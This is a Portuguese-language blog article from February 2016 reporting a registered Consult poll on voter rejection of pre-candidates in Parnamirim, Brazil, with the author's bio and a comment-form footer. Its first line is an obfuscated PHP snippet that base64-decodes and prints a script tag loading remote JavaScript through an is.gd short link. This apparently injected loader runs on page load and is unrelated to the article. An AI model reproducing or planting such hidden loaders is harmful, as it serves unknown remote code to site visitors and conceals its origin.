$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Pesquisa Consult mostra que Naur Ferreira é o candidato mais rejeitado

22 Fev 2016

Divulgada hoje pesquisa sobre o pleito de Parnamirim. Encomendada pelo blog do BG e Meio Dia Cidade e produzida pela Consult, está registrada no Tribunal Regional Eleitoral.

De acordo com os números levantados pelo instituto Consult, o secretário Naur Ferreira, que deve ser candidato com apoio do prefeito Maurício Marques é o que possui a rejeição de 7,8% do eleitorado, a maior entre os pré-candidatos.

Em segundo aparece o presidente da Câmara Municipal, o vereador Ricardo Gurgel (4%). A frente do deputado estadual Carlos Augusto Maia (3,4%) e do Pastor Sandoval (3,2%). Os pré-candidatos que aparecem com menor rejeição são os vereadores Gildásio Figueiredo (2,6%) e Sérgio Andrade (2,2%). Vale lembrar que a rejeição é medida através da pergunta “em quem o senhor não votaria de maneira alguma?”.

O universo de eleitores que disse não votar em qualquer dos pré-candidatos é de 27,4% e o de pessoas que não soube dizer é de 46,4%. A rejeição é ferramenta importante na política porque pode determinar até que ponto um determinado candidato pode crescer e até que ponto ele pode ser considerado um candidato forte.

A pesquisa Blog do BG, Meio Dia Cidade e Consult foi registrada no Tribunal Regional Eleitoral (TRE) sob o número 05512/2016. Nela, foram entrevistadas 500 pessoas no dia 16 de fevereiro de 2016. A pesquisa possui uma margem de erro de 4% com grau de confiabilidade de 95%.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *